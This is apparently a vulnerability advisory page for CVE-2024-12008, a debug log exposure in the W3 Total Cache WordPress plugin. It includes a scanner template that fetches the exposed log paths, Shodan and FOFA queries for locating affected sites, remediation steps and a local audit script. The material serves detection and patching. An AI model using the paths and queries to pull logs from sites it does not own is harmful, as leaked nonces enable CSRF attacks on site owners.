
W3 Total Cache < 2.8.2 - Log File Exposure

CVE-2024-12008
Early Release

Description

The plugin is vulnerable to Information Exposure through the publicly exposed debug log file. This makes it possible for unauthenticated attackers to view potentially sensitive information in the exposed log file. For example, the log file may contain nonce values that can be used in further CSRF attacks.

Severity

Medium

CVSS Score

5.3

Exploit Probability

56%

Affected Product

w3-total-cache

Published Date

June 11, 2026

Template Author

ritikchaddha

CVE-2024-12008.yaml
id: CVE-2024-12008

info:
  name: W3 Total Cache < 2.8.2 - Log File Exposure
  author: ritikchaddha
  severity: medium
  description: |
    The plugin is vulnerable to Information Exposure through the publicly exposed debug log file. This makes it possible for unauthenticated attackers to view potentially sensitive information in the exposed log file. For example, the log file may contain nonce values that can be used in further CSRF attacks.
  impact: |
    Unauthenticated attackers can extract sensitive credentials, leading to potential account compromise and further attacks.
  remediation: |
    Update the W3 Total Cache plugin to version 2.8.2 or later, which restricts access to debug log files. Additionally, disable debug logging in production environments and ensure .htaccess rules block direct access to the cache/log directory.
  reference:
    - https://wpscan.com/vulnerability/1685ca58-1622-433b-b561-304cb9d1bc56/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8292f23c-fb17-4082-9788-f643d1bb097e
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12008
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-12008
    epss-score: 0.56176
    epss-percentile: 0.98155
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 3
    vendor: boldgrid
    product: w3-total-cache
    framework: wordpress
    shodan-query: http.component:"WordPress" http.component:"W3 Total Cache"
    fofa-query: app="WordPress-W3-Total-Cache"
  tags: cve,cve2024,wordpress,wp,wp-plugin,w3-total-cache,exposure,logs

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/cache/log/000000/pagecache.log"
      - "{{BaseURL}}/wp-content/cache/log/000000/minify.log"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'regex("\\[[A-Za-z]{3}, \\d{2} [A-Za-z]{3} \\d{4} \\d{2}:\\d{2}:\\d{2} [+-]\\d{4}\\]", body)'
          - 'contains(body, "[/] [-]")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220780191b6c1c262f24117ce17bc3397d4a07e5e9c0cd73acd28db813715057d9602201f8efd4bc6b0a8605485fe453121075c4858842a45f377af6e604d5a1aa99168:922c64590222798bb761d5b6d8e72950

CVSS Metrics

Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2024-12008
CWE ID: CWE-532

References

https://wpscan.com/vulnerability/1685ca58-1622-433b-b561-304cb9d1bc56/
https://www.wordfence.com/threat-intel/vulnerabilities/id/8292f23c-fb17-4082-9788-f643d1bb097e
https://nvd.nist.gov/vuln/detail/CVE-2024-12008

Remediation Steps

Update the W3 Total Cache plugin to version 2.8.2 or later, which restricts access to debug log files. Additionally, disable debug logging in production environments and ensure .htaccess rules block direct access to the cache/log directory.
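
A local check for the remediation steps above, as an added example (not part of the template or the plugin): it walks a WordPress tree for log files under wp-content/cache/log, tests each against the two body conditions the template's matcher uses, and reports whether a deny-all .htaccess covers it. The function names, the sample log line and the choice of `Require all denied` / `Deny from all` as the blocking rule are assumptions.

```python
import re
import tempfile
from pathlib import Path

# The two body conditions from the template's DSL matcher.
TS_RE = re.compile(r"\[[A-Za-z]{3}, \d{2} [A-Za-z]{3} \d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}\]")
MARKER = "[/] [-]"
# Assumed blocking rule: Apache 2.4 / 2.2 directives that refuse every request.
DENY_RE = re.compile(r"^\s*(Require\s+all\s+denied|Deny\s+from\s+all)\s*$", re.I | re.M)


def htaccess_denies(directory, stop):
    """True if directory, or a parent up to and including stop, has a deny-all .htaccess."""
    for d in [directory, *directory.parents]:
        ht = d / ".htaccess"
        if ht.is_file() and DENY_RE.search(ht.read_text(errors="replace")):
            return True
        if d == stop:
            break
    return False


def audit(wp_root):
    """Return one finding per log file found under wp-content/cache/log."""
    log_root = Path(wp_root) / "wp-content" / "cache" / "log"
    findings = []
    for log in sorted(log_root.rglob("*.log")):
        body = log.read_text(errors="replace")
        findings.append({
            "path": log.relative_to(wp_root).as_posix(),
            "matches_template": bool(TS_RE.search(body)) and MARKER in body,
            "blocked_by_htaccess": htaccess_denies(log.parent, log_root),
        })
    return findings


def demo():
    """Audit a constructed tree twice: log unprotected, then with a deny rule."""
    line = "[Tue, 03 Dec 2024 10:15:42 +0000] [/] [-] constructed sample entry\n"
    with tempfile.TemporaryDirectory() as root:
        d = Path(root, "wp-content/cache/log/000000")
        d.mkdir(parents=True)
        (d / "pagecache.log").write_text(line)
        before = audit(root)
        (d.parent / ".htaccess").write_text("Require all denied\n")
        return before, audit(root)
```

A .htaccess rule only takes effect on Apache when AllowOverride permits it; on other web servers the equivalent deny rule has to live in the server configuration, so a `blocked_by_htaccess` result of true should still be confirmed with a request from outside.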